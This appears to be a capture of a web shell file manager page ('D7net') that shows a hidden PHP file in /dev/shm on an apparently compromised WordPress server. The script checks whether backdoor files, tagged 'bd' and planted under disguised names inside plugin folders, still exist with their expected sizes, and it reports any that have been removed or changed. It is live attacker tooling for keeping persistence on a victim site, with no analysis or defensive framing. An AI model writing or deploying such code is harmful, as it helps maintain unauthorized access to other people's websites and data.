D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
dev
/
shm
/
Filename :
.mrk
back
Copy
<?php $r = '/home/therbzja/cedarhighunited.com'; $x = ["/wp-content/plugins/give-recurring/src/PaymentGatewayModules/Modules/AuthorizeNet/Actions/print.php"=>"bd@@1025941@@1018", "/wp-content/plugins/give11/src/License/Migrations/news_archives.php"=>"bd@@1089072@@827", "/wp-content/plugins/give11/src/Framework/DesignSystem/server_export.php"=>"bd@@1089076@@878", "/wp-content/plugins/give11/src/Campaigns/Repositories/cron.bak.php"=>"bd@@1089079@@956", "/wp-content/plugins/give11/vendor/symfony/polyfill-ctype/cooliris3dwall.php"=>"bd@@1089084@@1106", "/wp-content/plugins/jeg-elementor-kit/lib/jeg-element/includes/class/option/sections/module.image.php"=>"bd@@1087776@@980", "/wp-content/plugins/advanced-custom-fields/includes/rest-api/class.acf.api.api.php"=>"bd@@1089087@@889"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');